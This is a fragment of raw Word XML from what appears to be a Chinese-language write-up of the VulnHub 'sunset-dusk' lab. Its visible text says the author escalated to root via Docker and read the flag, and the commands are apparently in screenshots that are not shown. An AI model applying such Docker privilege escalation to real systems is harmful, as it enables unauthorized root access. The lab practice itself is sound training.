    <w:p w14:paraId="4AD91C68" w14:textId="286F0C5E" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757AAB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里查了以下可以依靠docker变成root权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A27B9" w14:textId="68249063" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757AAB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06EDBD68" wp14:editId="49088D61">
            <wp:extent cx="5274310" cy="24180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111C" w14:textId="35265E1E" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757AAB"/>
    <w:p w14:paraId="1BF56E1B" w14:textId="791CDC4C" w:rsidR="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757AAB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟着它的步骤成功变成root权限顺便读到f</w:t>
      </w:r>
      <w:r>
        <w:t>lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F5096" w14:textId="1846745C" w:rsidR="00757AAB" w:rsidRPr="00757AAB" w:rsidRDefault="00757AAB" w:rsidP="00757A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EAA312" wp14:editId="5796A5C9">
            <wp:extent cx="5274310" cy="2292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AAB" w:rsidRPr="00757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17"/>
    <w:rsid w:val="000C5C17"/>
    <w:rsid w:val="003B1A5B"/>
    <w:rsid w:val="006C0B39"/>
    <w:rsid w:val="00757AAB"/>
    <w:rsid w:val="00CC642A"/>
    <w:rsid w:val="00D35842"/>
    <w:rsid w:val="00D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C7B1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{26AD7F0A-9DBD-4B80-B1C4-CF07DA3B2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1A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1A5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B1A5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1A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vulnhub.com/entry/sunset-dusk,404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2020-11-01T09:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-01T09:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>